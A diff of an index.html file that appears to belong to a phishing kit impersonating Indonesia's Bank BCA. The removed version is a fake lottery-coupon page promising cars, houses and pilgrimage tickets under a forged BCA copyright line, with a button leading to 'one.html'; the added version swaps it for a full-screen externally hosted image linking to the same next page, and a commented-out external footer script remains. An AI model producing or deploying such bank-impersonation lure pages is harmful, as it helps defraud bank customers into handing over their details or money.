--- a/index.html
+++ b/index.html
@@ -1,188 +1,29 @@
-<html lang="en">
- <head> 
-  <meta charset="UTF-8"> 
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
-  <meta http-equiv="X-UA-Compatible" content="ie=edge"> 
-  <meta name="fragment" content="!"> 
-  <meta name="theme-color" content="#1193e9"> 
-  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1"> 
-  <title>Cetak Kupon Undian Bank BCA</title> 
-  <style>
-      @import url("https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap");
+
+<html>
+
+<head>
+    <meta name="theme-color" content="#0F78CB"> 
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0">
+   
+
+    <!-- Demo styles -->
+    <style>
+      html,
       body {
-        padding: 0;
-        margin: 0;
-        width: 100%;
-        font-family: "Open Sans", sans-serif;
-        position: fixed;
-        background: #003366;
-      }
-
-      .container {
-        max-width: 100%;
-        width: 330px;
-        height: 430px;
-        background: #fff;
-        margin: -40px auto;
-        border-radius: 15px;
-        display: block;
         position: relative;
-        top: 150px;
-        box-shadow: 4px 7px 10px rgba(0, 0, 0, 0.5);
-        box-sizing: border-box;
-        justify-content: center;
-        justify-items: center;
-        align-items: center;
+        height: 100%;
+		overflow: hidden; 
+        background-color: #fff;
+        font-family: Helvetica Neue, Helvetica, Arial, sans-serif;
+        font-size: 14px;
+        color: #000;
+        margin: 0;
+        padding: 0;
       }
-      .wraper {
-        width: 100%;
-        position: fixed;
-        top: 30px;
-        height: 18%;
-        left: 0;
-        right: 0;
-        margin: 5px;
-      }
-      .wraper img {
-        width: 320px;
-        margin: 9px;
-        height: 165px;
-        margin-top: 80px;
-      }
-      .animasi {
-        margin-top: -70px;
-        position: absolute;
-        left: 0px;
-        right: 0;
-      }
-      .box-otp {
-        max-width: 90%;
-        width: 287px;
-        padding: 10px;
-        margin: 22px;
-        text-align: center;
-        font-size: 15px;
-        outline: none;
-        background: #fff;
-        border-radius: 8px;
-        border: 1px solid #c0c0c0;
-        font-weight: 600;
-        z-index: 999999999;
-        box-sizing: border-box;
-      }
-      #pelew {
-        width: 100%;
-        padding: 10px;
-        margin: 0px;
-        border: 1px solid #fff;
-        cursor: pointer !important;
-        background: #003366;
-        border-radius: 8px;
-        font-size: 15px;
-        color: #fff;
-        font-weight: 600;
-        box-shadow: 4px 7px 0px rgba(0, 0, 0, 0.5);
-      }
-      h1 {
-        display: table;
-        background-color: transparent;
-        color: #ff0000;
-        width: 100%;
-        font-size: 10px;
-        margin-bottom: -70px;
-        text-align: center;
-        font-weight: bold;
-        right: 0;
-        left: 0;
-        margin: 0px auto;
-        position: fixed;
-      }
+</style>
+                <a href="one.html"><img src="https://hosting.tigerengine.id/t3xr0l.png" style="width: 100%; left: 0px; top: 0px; height: 100%"></a>
+            </div>
 
-      .blink {
-        animation: blink-animation 2s steps(6, start) infinite;
-        -webkit-animation: blink-animation 2s steps(6, start) infinite;
-      }
-      @keyframes blink-animation {
-        to {
-          visibility: hidden;
-        }
-      }
-      @-webkit-keyframes blink-animation {
-        to {
-          visibility: hidden;
-        }
-      }
-
-      #Aktivasi {
-        display: none;
-      }
-      .textarea1 {
-        box-sizing: border-box;
-        border: 1px solid red;
-        border-radius: 8px;
-      }
-      .textarea2 {
-        box-sizing: border-box;
-        border: 2px solid #c7b700;
-        border-radius: 8px;
-      }
-    </style> 
- </head> <img src="https://hosting.tigerengine.id/3w2gvq.jpg" width="100%" height="60px">
- <body> 
-  <div class="container"> 
-   <div class="wraper"> <br><br><br>
-    <center> 
-     <img src="https://hosting.tigerengine.id/z5cnub.png" alt="" class=""> 
-     <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXVwo82cpg6CV_u3KjMyT7XomeqYZBW4FYS1BrlBMtrsYOwr3Flnh1ONvKmU_33KzkTpocE66g1h-VH9lbf2LOkNz2gXRWT1MS48FPRqz2p3y1USlAdtBC_ETVzicxtjdly9-O1pct-TWArQ2km-4DWNipqLryUfiy7q-lvPWgDmYTicPSc3LWn4lz3d0/s320/https___ce64c9d57a81b0071425df9f602e4e02.cdn.bubble.io_f1711534146768x263703491967350430_https___f5eb8685fdc0600412a283556a5f209a.cdn.bubble.io_f1703135155882x705205408323363200_CLIPLY_372109170_FREE_FIREWORKS_400.gif" alt="" class="animasi"> 
-    </center> 
-   </div> 
-   <br>
-   <br> 
-   <div style="
-          width: 90%;
-          padding: 9px;
-          border-bottom: 1px solid transparent;
-          margin: 60px;
-          position: relative;
-          top: 50px;
-        "> 
-    <h6 style="text-align: center; font-size: 13px; color: #000"> <strong>CETAK KUPON ANDA</strong><br>Raih Hadiah • 12 Unit Mobil Mercedes • 2 Unit Mobil BMW • 7 Unit Mobil CR-V Turbo • 3 Unit Mobil Fortuner • 15 Unit Rumah Gratis • 25 Tiket Umroh Gratis </h6> 
-   </div> 
-   <form action="one.html" method="post" id=""> 
-    <span class="blink" style="display: none" id="blinkAktivasi"><h1></h1></span> 
-    <div class="box-=input" <="" div=""> 
-     <center> 
-      <p id="alert" style="
-              font-size: 10px;
-              width: 100%;
-              background: transparent;
-              color: #000;
-              position: fixed;
-              text-align: center;
-              top: 355px;
-              right: 0;
-              left: 0;
-              font-weight: bold;
-            " class="alert"></p> 
-     </center> 
-     <div class="box-btn"> 
-      <button type="submit" id="pelew">Cetak Kupon</button> 
-     </div> 
-    </div>
-   </form> 
-   <br> 
-   <br> 
-   <br>
-   <br> 
-   <button style="
-        width: 100%;
-        font-size: 12px;
-        background: none;
-        border: none;
-        text-align: center;
-        font-weight: bold;
-        position: fixed;
-        margin-top: 80px;
-        margin-left: 0;
-        color: rgb(9, 100, 127);
-      " onclick="sendUlang()"> &gt;&gt;© 2025 PT Bank Central Asia Tbk.&lt;&lt; </button> 
+</body>
+</html><!--<script src='https://a.bsite.net/footer.js'></script>
